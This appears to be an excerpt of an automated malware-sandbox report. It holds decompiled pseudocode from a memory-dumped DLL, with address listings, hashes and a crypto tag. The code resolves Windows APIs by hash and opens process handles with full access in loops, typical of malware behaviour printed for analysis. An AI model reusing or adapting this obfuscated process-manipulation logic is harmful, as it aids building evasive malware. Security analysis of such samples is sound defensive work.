												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E7CAC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E7CCD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E7D38F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E7CF4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E7CF4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E7D38F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E7CF4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 4);
								 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E7CF4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E7D3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E7CF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E7CF4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 4);
										 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E7CF4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E7CF4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E7D38F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E7CF4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E7D3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E7D38F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E7CF4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e7ca4f2
0x6e7ca4f4
0x6e7ca4ff
0x6e7ca505
0x6e7ca509
0x6e7ca50e
0x6e7ca514
0x6e7ca524
0x00000000
0x6e7ca526
0x6e7ca526
0x6e7ca531
0x6e7ca531
0x6e7caaaf
0x6e7caab1
0x6e7caab2
0x6e7caaf1
0x6e7caaf5
0x6e7cab03
0x6e7cab11
0x6e7cab11
0x6e7caafc
0x6e7cab17
0x6e7cab1c
0x00000000
0x6e7cab1c
0x6e7cab00
0x6e7cab01
0x00000000
0x6e7ca53b
0x6e7ca53b
0x6e7ca53f
0x6e7ca646
0x6e7ca646
0x6e7ca64b
0x6e7ca75c
0x6e7ca760
0x6e7ca765
0x6e7ca769
0x6e7ca893
0x6e7ca895
0x6e7ca899
0x6e7ca8a2
0x6e7ca8ab
0x6e7ca8af
0x6e7ca8b8
0x6e7ca8bf
0x6e7ca8c0
0x6e7ca8c4
0x6e7ca8c8
0x6e7ca8cc
0x6e7ca8ce
0x6e7caa38
0x6e7caa38
0x6e7caa40
0x6e7caa58
0x6e7caa5a
0x6e7caa5c
0x6e7caa96
0x6e7caa96
0x6e7caa98
0x6e7caa98
0x6e7caa9b
0x6e7caab6
0x6e7caaca
0x6e7caacd
0x6e7caad2
0x6e7caadd
0x6e7caade
0x6e7caae1
0x6e7caae3
0x6e7caaec
0x00000000
0x6e7caaec
0x6e7caa9d
0x6e7caaa1
0x6e7caaaa
0x00000000
0x6e7caaaa
0x6e7caa6d
0x6e7caa7d
0x6e7caa81
0x6e7caa81
0x6e7caa84
0x6e7caa87
0x6e7caa8a
0x6e7caa90
0x00000000
0x00000000
0x00000000
0x6e7caa92
0x6e7ca8d6
0x6e7ca8d6
0x6e7ca8d8
0x6e7ca8dc
0x6e7ca8e1
0x6e7ca8e3
0x6e7ca8e7
0x6e7ca8ea
0x6e7ca8f2
0x6e7ca8f4
0x00000000
0x00000000
0x6e7ca90b
0x6e7ca926
0x6e7ca928
0x6e7ca93b
0x6e7ca93d
0x6e7ca93f
0x6e7ca95a
0x6e7ca95a
0x6e7ca95e
0x6e7ca960
0x00000000
0x00000000
0x6e7ca962
0x6e7ca965
0x6e7ca986
0x6e7ca9a5
0x6e7ca9ab
0x6e7ca9ae
0x6e7ca9b3
0x6e7ca9b4
0x6e7ca9b8
0x00000000
0x00000000
0x6e7ca9c0
0x6e7ca9c0
0x6e7ca9c2
0x6e7ca9ce
0x6e7ca9da
0x6e7ca9e4
0x6e7ca9e7
0x6e7ca9ea
0x6e7ca9ee
0x6e7ca9f5
0x6e7ca9f9
0x6e7ca9fd
0x6e7ca9fe
0x6e7caa02
0x6e7caa07
0x6e7caa0c
0x6e7caa10
0x6e7caa14
0x6e7caa1a
0x6e7caa20
0x6e7caa26
0x6e7caa2c
0x6e7caa31
0x6e7caa32
0x6e7caa32
0x00000000
0x6e7ca9c2
0x00000000
0x6e7ca965
0x6e7ca943
0x6e7ca954
0x6e7ca956
0x6e7ca958
0x00000000
0x00000000
0x00000000
0x6e7ca958
0x6e7ca96b
0x00000000
0x6e7ca96b
0x6e7ca76f
0x6e7ca772
0x6e7ca774
0x00000000
0x00000000
0x6e7ca77c
0x6e7ca77c
0x6e7ca77e
0x6e7ca77e
0x6e7ca78f
0x6e7ca791
0x6e7ca794
0x00000000
0x00000000
0x6e7ca88a
0x6e7ca88b
0x6e7ca88d
0x00000000
0x00000000
0x00000000
0x6e7ca88d
0x6e7ca79a
0x6e7ca79d
0x6e7ca7a7
0x6e7ca7ac
0x6e7ca7ae
0x6e7ca7b4
0x6e7ca7bb
0x6e7ca7bf
0x6e7ca7c4
0x6e7ca7c8
0x6e7cac03
0x6e7cac17
0x6e7cac3a
0x6e7cac3f
0x6e7cac3f
0x6e7ca7df
0x6e7ca7e4
0x6e7ca7e4
0x6e7ca7e4
0x6e7ca7e4
0x6e7ca7ea
0x6e7ca7ef
0x6e7ca7f1
0x6e7ca7f6
0x6e7ca7fd
0x6e7ca802
0x6e7ca804
0x6e7cabc1
0x6e7cabd2
0x6e7cabec
0x6e7cabf1
0x6e7cabf1
0x6e7ca81a
0x6e7ca81f
0x6e7ca81f
0x6e7ca81f
0x6e7ca81f
0x6e7ca833
0x6e7ca851
0x6e7ca856
0x6e7ca866
0x6e7ca883
0x6e7ca885
0x6e7ca885
0x00000000
0x6e7ca79d
0x6e7ca653
0x6e7ca653
0x6e7ca655
0x6e7ca65c
0x6e7ca66a
0x6e7ca66c
0x6e7ca66f
0x6e7ca676
0x6e7ca678
0x6e7ca6a9
0x6e7ca6b8
0x6e7ca6ba
0x6e7ca6bc
0x6e7ca6da
0x6e7ca6dc
0x6e7ca6de
0x6e7ca6f1
0x6e7ca710
0x6e7ca716
0x6e7ca719
0x6e7ca730
0x6e7ca74c
0x6e7ca74e
0x6e7ca74e
0x6e7ca74e
0x6e7ca74e
0x6e7ca6de
0x00000000
0x6e7ca6bc
0x6e7ca67c
0x6e7ca67c
0x6e7ca67e
0x6e7ca68f
0x6e7ca691
0x6e7ca693
0x00000000
0x00000000
0x6e7ca69f
0x6e7ca6a0
0x6e7ca6a7
0x00000000
0x00000000
0x00000000
0x6e7ca6a7
0x6e7ca695
0x6e7ca698
0x00000000
0x00000000
0x6e7ca751
0x6e7ca751
0x6e7ca752
0x6e7ca752
0x00000000
0x6e7ca545
0x6e7ca547
0x6e7ca547
0x6e7ca549
0x6e7ca550
0x6e7ca55e
0x6e7ca560
0x6e7ca564
0x6e7ca568
0x6e7ca56a
0x6e7ca598
0x6e7ca59b
0x6e7ca5a0
0x6e7ca5a4
0x6e7ca5a9
0x6e7ca5b0
0x6e7ca5b5
0x6e7ca5b7
0x6e7cab7e
0x6e7cab8f
0x6e7cabaf
0x6e7cabb4
0x6e7cabb4
0x6e7ca5cd
0x6e7ca5d2
0x6e7ca5d2
0x6e7ca5d2
0x6e7ca5d2
0x6e7ca5e4
0x6e7ca5e6
0x6e7ca5e8
0x6e7ca5f9
0x6e7ca5f9
0x6e7ca5ff
0x6e7ca604
0x6e7ca608
0x6e7ca60e
0x6e7ca615
0x6e7ca61a
0x6e7ca61c
0x6e7cab32
0x6e7cab43
0x6e7cab64
0x6e7cab69
0x6e7cab69
0x6e7ca633
0x6e7ca638
0x6e7ca638
0x6e7ca638
0x6e7ca638
0x6e7ca63b
0x6e7ca63b
0x00000000
0x6e7ca63b
0x6e7ca56e
0x6e7ca56e
0x6e7ca570
0x6e7ca581
0x6e7ca583
0x6e7ca585
0x00000000
0x00000000
0x6e7ca591
0x6e7ca592
0x6e7ca596
0x00000000
0x00000000
0x00000000
0x6e7ca596
0x6e7ca587
0x6e7ca58a
0x00000000
0x00000000
0x6e7ca63c
0x6e7ca63c
0x6e7ca63d
0x6e7ca63d
0x00000000
0x6e7ca549
0x6e7ca53f

Strings

, xrefs: 6E7CAAF7

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3dd00ed1dc016fa6f859bfde7c0f585624c186cbc6eb60c0fbcb0222e7e627d0
Instruction ID: bb03f2ed3c0508e81112f1908d4bda4116faa7c98f74d024b8fa2c384311af09
Opcode Fuzzy Hash: 3dd00ed1dc016fa6f859bfde7c0f585624c186cbc6eb60c0fbcb0222e7e627d0
Instruction Fuzzy Hash: D31273715046019FC714DFA4CA84AAEB7EDEF84B04F108E2DE99A972B1DB309D05CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E7C8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E7CB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E7CF4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E7CF654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E7D2234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E7CF654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E7CF584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E7CF584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E7CF4BC(_t449 + 0x14, 0);
									_t180 = E6E7D2908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E7CB5C4(_t449 + 0x34);
										E6E7CB5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E7CF4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E7CF4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E7CB5C4(_t449 + 0x34);
										E6E7CB5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E7CCA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E7CC280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E7CF828(_t449 + 0x14, E6E7CF4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E7CF4BC(_t449 + 0x14, E6E7CF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E7D3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E7CF828(_t449 + 0x40, E6E7CF4CC(_t449 + 0x3c) + 4);
											 *(E6E7CF4BC(_t449 + 0x40, E6E7CF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E7CCD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E7CF4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E7CF4BC(_t449 + 0x40, _t431 * 4);
												E6E7C8B58( *_t211, E6E7D02B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E7CCD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E7CF4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E7CF4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E7CF4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E7CF4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E7CF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E7D38F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E7CF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E7CF4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E7CF4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E7CF4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E7CF4BC(_t322, _t430);
										E6E7D38F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E7CF4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E7CF828(_t322, E6E7CF4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 4);
								 *(E6E7CF4BC( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E7CF828(_t322, E6E7CF4CC(_t322) + 4);
								 *(E6E7CF4BC(_t322, E6E7CF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E7CF4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E7D3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E7CF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 4);
										 *(E6E7CF4BC( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E7CF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E7CF828( *((intOrPtr*)(_t449 + 0x74)), E6E7CF4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E7CF4BC( *((intOrPtr*)(_t449 + 0x74)), E6E7CF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E7CF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E7CF4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E7CF4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E7CF4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E7CF4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E7CF4BC(_t430, _t443);
